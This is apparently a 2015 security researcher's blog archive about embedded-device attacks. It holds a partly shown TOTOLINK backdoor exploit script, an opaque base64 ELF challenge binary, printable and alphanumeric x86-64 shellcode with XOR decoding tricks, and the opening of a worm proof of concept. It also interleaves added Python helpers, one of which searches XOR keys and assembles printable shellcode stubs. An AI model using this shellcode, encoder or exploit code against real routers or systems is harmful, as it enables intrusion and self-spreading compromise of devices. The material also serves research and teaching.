Posts

Showing posts from August, 2015

simulating router firmware for live demonstration, more advanced RE, or just giggles

So I needed to put together a live demonstration for a presentation I'm doing soon on the attack surface of embedded devices, and why the industry seems to want their devices vulnerable. I have never needed to boot a firmware image in such a controlled manner before, and decided this would be something nice to share with others so they can get this kind of thing up and running without hassle for their warped projects. So without further ado, let's get started.

Before you set this up, you will need a basic virtual machine with the GNU/Linux distribution of your choice. You will also need to have already extracted the firmware image into a folder called squashfs-root, unless you want to do the smart thing and adapt these instructions to your own setup.

First, open /etc/inittab from your firmware image, locate the sysinit line and take note of what it runs:

    ::sysinit:/etc/rcS
    ::respawn:/sbin/getty 115200 ttyS1
    ::respawn:/bin/sh
    ::restart:/sbin/init
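The sysinit entry is what you will have to launch yourself once the extracted root is running under emulation, and the respawn entries tell you where the console shells live. As an added example that is not part of the original post, here is a small parser for the BusyBox inittab format (`id:runlevel:action:process`, which is my assumption about the file's layout) run over a constructed copy of the four lines quoted above:

```python
# Added example (not from the original post): parse a BusyBox-style
# /etc/inittab from an extracted firmware root and report what init will run.
# Assumed entry format: "id:runlevel:action:process" (BusyBox ignores runlevel).
import re
from collections import defaultdict

# Constructed sample, mirroring the four entries quoted in the post.
SAMPLE_INITTAB = """\
# BusyBox inittab
::sysinit:/etc/rcS
::respawn:/sbin/getty 115200 ttyS1
::respawn:/bin/sh
::restart:/sbin/init
"""


def parse_inittab(text):
    """Return {action: [(tty, process), ...]} for every non-comment entry."""
    entries = defaultdict(list)
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # at most 4 fields, so a ':' inside the process string survives
        parts = line.split(":", 3)
        if len(parts) != 4:
            continue                       # malformed line: ignore it
        tty, _runlevel, action, process = parts
        entries[action].append((tty or None, process.strip()))
    return dict(entries)


def boot_sequence(text):
    """What BusyBox init runs at boot, in order: sysinit, wait, once, then respawn.
    'restart' entries are only used when init is asked to restart, so they are left out."""
    entries = parse_inittab(text)
    order = []
    for action in ("sysinit", "wait", "once", "respawn"):
        order.extend((action, proc) for _tty, proc in entries.get(action, []))
    return order


def console_shells(text):
    """Respawned processes that hand out a shell or login prompt; a getty on
    ttyS1 means a serial console you can reach from the emulator's UART."""
    shells = []
    for _tty, proc in parse_inittab(text).get("respawn", []):
        if re.search(r"/(getty|login|sh|ash)\b", proc):
            shells.append(proc)
    return shells


if __name__ == "__main__":
    for action, proc in boot_sequence(SAMPLE_INITTAB):
        print(f"{action:8s} {proc}")
    print("console entry points:", console_shells(SAMPLE_INITTAB))
```

Point it at `squashfs-root/etc/inittab` instead of the sample and the first `sysinit` line is the script to start by hand inside the emulated root.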

TOTOLINK backdoor exploitation POC

The following is a simple router exploit POC, for giggles, based on the following vulnerability. It would appear this doesn't even have a CVE, nor has the manufacturer been notified. I will be notifying the manufacturer and will also be writing another worm POC based on this exploit lol.

    #!/usr/bin/env python
    # ------------------------------------------------------------------------------
    # THE SCOTCH-WARE LICENSE (Revision 43):
    # <aaronryool@gmail.com> wrote this file. As long as you retain this notice you
    # can do whatever you want with this stuff. If we meet some day, and you think
    # this stuff is worth it, you can buy me a shot of scotch in return
    # ------------------------------------------------------------------------------
    import socket, sys, urllib

    if len(sys.argv) < 2:
        print("Usage: %s <ip> <command string>...\x1b[0m" % sys.argv[0])
        exit(1)

    commandstr = urllib.quote_plus(" &quo

I have a new challenge for you ;) good luck

Below is a challenge, figure it out lol. Email answers to: aaronryool@gmail.com for shout outs

    f0VMRki7Z4lotpbWTn/DAAIAPgABAAAAQIAECAAAAADyAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAAB
    AAAAAAAAAFhIg/gCfDFYWGhQgAQI67RIuUiLCEgx2cMAUUi5LRSQkJCQkJBRSLlIuiDmB9Lao1H/
    1Egx0XQ4aIQAAAC6YOb/3Lhldm9MSMHgIEg1ZXRhSDQPW0g1AAA5R0jB4iCA6zxIMdAw3EiJBQAA
    AABIMcBqAWoBWF9IjTQlxYAECGotWg8F67NZQVkhISEgVGhhdCB0aGluZyB5b3UgZGlkLCB0ZWxs
    IG1lIGFib3V0IGl0LgoBAAAABwAAAAAAAAAAAAAAAIAECAAAAAAAgAQIAAAAACoBAAAAAAAAKgEA
    AAAAAAAAEAAAAAAAAA==
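The blob starts with `f0VMRk`, which is base64 for `\x7fELF`, so the obvious first move is to decode it and read the ELF headers before touching a disassembler. The script below is an added example, not part of the challenge post and not a solution: it decodes the text exactly as posted, parses the Elf64 file and program headers with the standard struct layouts, flags anything odd in the identification bytes, and pulls out printable strings. The field names are the standard ELF ones; nothing else is assumed.

```python
# Added example (not part of the challenge post): first-pass triage of the
# challenge blob. It decodes and parses headers; it does not solve the challenge.
import base64
import struct

# The base64 text exactly as posted in the challenge.
CHALLENGE_B64 = """
f0VMRki7Z4lotpbWTn/DAAIAPgABAAAAQIAECAAAAADyAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAAB
AAAAAAAAAFhIg/gCfDFYWGhQgAQI67RIuUiLCEgx2cMAUUi5LRSQkJCQkJBRSLlIuiDmB9Lao1H/
1Egx0XQ4aIQAAAC6YOb/3Lhldm9MSMHgIEg1ZXRhSDQPW0g1AAA5R0jB4iCA6zxIMdAw3EiJBQAA
AABIMcBqAWoBWF9IjTQlxYAECGotWg8F67NZQVkhISEgVGhhdCB0aGluZyB5b3UgZGlkLCB0ZWxs
IG1lIGFib3V0IGl0LgoBAAAABwAAAAAAAAAAAAAAAIAECAAAAAAAgAQIAAAAACoBAAAAAAAAKgEA
AAAAAAAAEAAAAAAAAA==
"""

EHDR = struct.Struct("<16sHHIQQQIHHHHHH")   # Elf64_Ehdr, 64 bytes, little endian
PHDR = struct.Struct("<IIQQQQQQ")           # Elf64_Phdr, 56 bytes
EHDR_FIELDS = ("e_ident", "e_type", "e_machine", "e_version", "e_entry", "e_phoff",
               "e_shoff", "e_flags", "e_ehsize", "e_phentsize", "e_phnum",
               "e_shentsize", "e_shnum", "e_shstrndx")
PHDR_FIELDS = ("p_type", "p_flags", "p_offset", "p_vaddr", "p_paddr",
               "p_filesz", "p_memsz", "p_align")


def decode_blob(b64=CHALLENGE_B64):
    """Strip the line wrapping and decode."""
    return base64.b64decode("".join(b64.split()))


def parse_elf64(blob):
    """Return (ehdr dict, [phdr dict, ...]); raises on a bad magic."""
    if blob[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    hdr = dict(zip(EHDR_FIELDS, EHDR.unpack_from(blob, 0)))
    phdrs = []
    for i in range(hdr["e_phnum"]):
        off = hdr["e_phoff"] + i * hdr["e_phentsize"]
        phdrs.append(dict(zip(PHDR_FIELDS, PHDR.unpack_from(blob, off))))
    return hdr, phdrs


def ident_oddities(hdr):
    """e_ident[4..15] is class/data/version/ABI followed by zero padding in a
    normal file. The Linux loader only checks the 4-byte magic, so tiny or
    hand-made ELFs often stash code there; report what is actually present."""
    ident = hdr["e_ident"]
    return {"ei_class": ident[4], "ei_data": ident[5], "ei_version": ident[6],
            "ei_osabi": ident[7], "pad_is_zero": ident[8:16] == bytes(8)}


def printable_strings(blob, min_len=8):
    """Runs of at least min_len printable ASCII bytes (what `strings` would show)."""
    out, run = [], bytearray()
    for b in blob + b"\x00":          # sentinel flushes the final run
        if 0x20 <= b <= 0x7e:
            run.append(b)
        else:
            if len(run) >= min_len:
                out.append(run.decode("ascii"))
            run = bytearray()
    return out


def triage(b64=CHALLENGE_B64):
    blob = decode_blob(b64)
    hdr, phdrs = parse_elf64(blob)
    seg = phdrs[0]
    return {
        "size": len(blob),
        "type": hdr["e_type"], "machine": hdr["e_machine"], "entry": hdr["e_entry"],
        "segments": phdrs,
        # file offset of the first instruction, via the segment that maps the entry
        "entry_offset": hdr["e_entry"] - seg["p_vaddr"] + seg["p_offset"],
        "ident": ident_oddities(hdr),
        "strings": printable_strings(blob),
    }


if __name__ == "__main__":
    for k, v in triage().items():
        print(f"{k:14s} {v if not isinstance(v, int) else hex(v)}")
```

Everything you need to start is in the output: one RWX LOAD segment, an entry point just past the 64-byte header, non-zero bytes where the identification padding should be, and a string that is clearly meant for whoever gets that far.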

Hax 4 Snacks Part 1

So a new friend of mine told me he wanted help extracting the shellcode and payloads from a .doc file. I had never analyzed a .doc file before, so I just HAD to say yes, after informing him that I hadn't done analysis of this particular attack vector before. In the end he said he would buy me a pizza if I could pull this off. It turns out this evil thing is a copycat of an existing piece of malware (find information here), and it's the evil version of that lol. That made my analysis easier, especially since I have never analyzed Office documents before in my LIFE. So far I can confirm that this uses at least some of the same exploits, and I feel safe to conjecture that it is just an obfuscated repackaging of the original malware concept. This version also appears to be somewhat smaller in size. In part two I hope to do further analysis to find the signature of the egg, and decrypt the second stage shellcode. I will also plan on doing a more in depth closing analy

stack based binary obfuscation from hell

So I had a funny idea, and decided to do this: the code is pushed onto the stack in reverse order, and the pieces have to be put on in little endian so everything comes out right. I padded everything with NOPs as well.

    [bits 64]
    section .text
    global _start
    org 0x08048000

    ehdr:                               ; Elf64_Ehdr
        db 0x7F, "ELF", 2, 1, 1, 0      ; e_ident
        times 8 db 0
        dw 2                            ; e_type
        dw 62                           ; e_machine
        dd 1                            ; e_version
        dq _start                       ; e_entry
        dq phdr - $$                    ; e_phoff
        dq 0                            ; e_shoff
        dd 0                            ; e_flags
        dw ehdrsize                     ; e_ehsize
        dw phdrsize                     ; e_phentsize
        dw 1                            ; e_phnum
        dw 0                            ; e_shentsize
        dw 0

printable shellcode example for knowledge spreading and stuff ;)

A simple example to show you how you can run encoded non-printable things like syscall on the stack with magic and stuff. This turns into: "hNDqqTXP, PYhAAAAX1A jNX4r"

    [bits 64]
    _start:
        push 0x7171444e      ; store our code in little endian
        push rsp             ; return pointer
        pop rax
        push rax
        sub al, 32           ; needed to make the xor printable; this will fail on the rare occasion when the value is less than 32
        push rax             ; copy rax into rcx
        pop rcx
        push 0x41414141      ; syscall code block key
        pop rax
        xor [rcx+32], eax    ; decode the syscall code block using an offset for more ass pulling
        push 0x4e            ; encoded syscall number for exit
        pop rax
        xor al, 0x72         ; xor it with the key
        ret                  ; this is removed when turned into shellcode

    ; printable: 0x20 - 0x7e
    ; alphanum: 0x30 - 0x39, 0x41 - 0x5A, 0x61 - 0x7A
    ; CODE                   | ASCII  | HEX
    ;________________________|____

Alphanumeric shellcode example for peace and magic.

So a friend of mine was having trouble doing syscalls in his exploration of alphanumeric shellcode, and I thought I would lend him a hand :D enjoy. This all turns into: "h0ppoXH50p0o4nPYhAAAAX1A0jNX4rNDqq" You will need to replace the absolute address magic with your own to have this run :P

    [bits 64]
    _start:
    ; printable: 0x20 - 0x7e
    ; alphanum: 0x30 - 0x39, 0x41 - 0x5A, 0x61 - 0x7A
    ; CODE                   | ASCII  | HEX
    ;________________________|________|_________________________
    ; and rax, 0x7a7a7a7a    | H%zzzz | 0x48,0x25,0x7a,0x7a,0x7a,0x7a
    ; and eax, 0x7a7a7a7a    | %zzzz  | 0x25,0x7a,0x7a,0x7a,0x7a
    ; and ax, 0x7a7a         | f%zz   | 0x66,0x25,0x7a,0x7a
    ; and al, 0x7a           | $z     | 0x24,0x7a
    ; sub rax, 0x7a7a7a7a    | H-zzzz | 0x48,0x2d,0x7a,0x7a,0x7a,0x7a
    ; sub eax, 0x7a7a7a7a    | -zzzz  | 0x2d,0x7a,0x7a,0x7a,0x7a
    ; sub ax, 0x7a7a         | f-zz   | 0x66,0x2d,0x7a,0x7a
    ; sub al, 0x7a           | ,z     | 0x2c,0x7a
    ; xor rax, 0x7a7a7a7a
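Both the printable stub and the alphanumeric one above rest on the same two choices: a single XOR key that is itself inside the allowed alphabet and maps every byte of the real code (`0f 05` for syscall, `3c` for exit) back inside it, and a `push imm32` whose little-endian immediate lays the encoded block down in memory order. The script below is an added example, not the posts' code, that makes those choices checkable: it searches the keys, reproduces the `push 0x7171444e` / `jN` / `4r` constants, rebuilds the first post's 26-byte stub from its instruction sequence using the standard x86-64 encodings, and encodes the `sub al, 32` caveat as a check. The default pad byte 0x30 for short blocks is my choice (it matches the `qq` tail of the posted block, but any byte that stays in the alphabet after the key works, since the padding sits after the syscall).

```python
# Added example (not from either shellcode post): the byte-level bookkeeping
# behind those decoder stubs, written so the key choices can be checked.

PRINTABLE = bytes(range(0x20, 0x7f))                       # 0x20 - 0x7e
ALNUM = b"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def in_alphabet(data, alphabet):
    return all(b in alphabet for b in data)


def xor_keys(target, alphabet):
    """Single-byte keys that are in alphabet and map every byte of target into alphabet."""
    return [k for k in alphabet if all((b ^ k) in alphabet for b in target)]


def xor_encode(data, key):
    """XOR with a single-byte key; XOR is its own inverse, so this also decodes."""
    return bytes(b ^ key for b in data)


def encode_block(target, alphabet=ALNUM, pad=0x30):
    """Pad target up to one 'push imm32' (4 bytes) and encode it with the first
    key that works. Pad bytes sit after the real code (only reached on fall-through)."""
    block = target + bytes([pad]) * ((-len(target)) % 4)
    keys = xor_keys(block, alphabet)
    if not keys:
        raise ValueError("no single-byte key keeps this block inside the alphabet")
    return xor_encode(block, keys[0]), keys[0]


def push_imm32(block):
    """Immediate for 'push imm32' that lands block on the stack in memory order."""
    return int.from_bytes(block, "little")


def sub_al_is_safe(rsp):
    """'sub al, 32' only touches the low byte: if rsp's low byte is below 32 it
    wraps instead of borrowing and the pointer is wrong (the post's 'rare occasion')."""
    return (rsp & 0xff) >= 32


def printable_stub(target=b"\x0f\x05", sysno=60, alphabet=ALNUM, sysno_key=None):
    """Rebuild the first post's decoder from its instruction sequence, with the
    standard x86-64 encodings (e.g. 'xor [rcx+disp8], eax' is 31 41 disp8):
      push imm32 ; push rsp ; pop rax ; push rax ; sub al,32 ; push rax ; pop rcx ;
      push key32 ; pop rax ; xor [rcx+32],eax ; push n ; pop rax ; xor al,k"""
    block, key = encode_block(target, alphabet)
    sysno_keys = xor_keys(bytes([sysno]), alphabet)
    if sysno_key is None:
        sysno_key = sysno_keys[0]
    elif sysno_key not in sysno_keys:
        raise ValueError("syscall-number key does not keep both bytes in the alphabet")
    stub = (b"\x68" + block                           # push imm32 (encoded block)
            + b"\x54\x58"                             # push rsp ; pop rax
            + b"\x50\x2c\x20"                         # push rax ; sub al, 32
            + b"\x50\x59"                             # push rax ; pop rcx
            + b"\x68" + bytes([key]) * 4              # push key32
            + b"\x58"                                 # pop rax
            + b"\x31\x41\x20"                         # xor [rcx+32], eax
            + b"\x6a" + bytes([sysno ^ sysno_key])    # push encoded syscall number
            + b"\x58"                                 # pop rax
            + b"\x34" + bytes([sysno_key]))           # xor al, key
    if not in_alphabet(stub, PRINTABLE):
        raise ValueError("stub left the printable range")
    return stub


if __name__ == "__main__":
    enc, key = encode_block(b"\x0f\x05")
    print("syscall block:", enc, "key", hex(key), "push", hex(push_imm32(enc)))
    print("exit keys (alnum):", [hex(k) for k in xor_keys(b"\x3c", ALNUM)])
    print("stub:", printable_stub(sysno_key=0x72))
```

Run it and the first workable alphanumeric key for `0f 05 30 30` is `A`, which is where `NDqq` and `push 0x7171444e` come from; `0x72` is one of many keys that turn `0x3c` into a letter, which is why the posts could pick `r`/`N`. The `sub al, 32` check is the thing to look at when a stub works in one process and not another: it depends only on the low byte of rsp.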

Wimax worm POC

This is the non-obfuscated code for the live demonstration worm for a talk I plan to do on the vulnerability of embedded ARM devices. This is a prime example of industry laziness. Have fun :D I am in no way responsible for any use, or damage caused by the use, of this code. If you are somehow able to modify this to do harm of any kind, you have modified it enough to be held responsible for your actions.

    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @ THE SCOTCH-WARE LICENSE (Revision 0):
    @ aaronryool@gmail.com wrote this file. As long as you retain this notice you
    @ can do whatever you want with this stuff. If we meet some day, and you think
    @ this stuff is worth it, you can buy me a shot of scotch in return
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@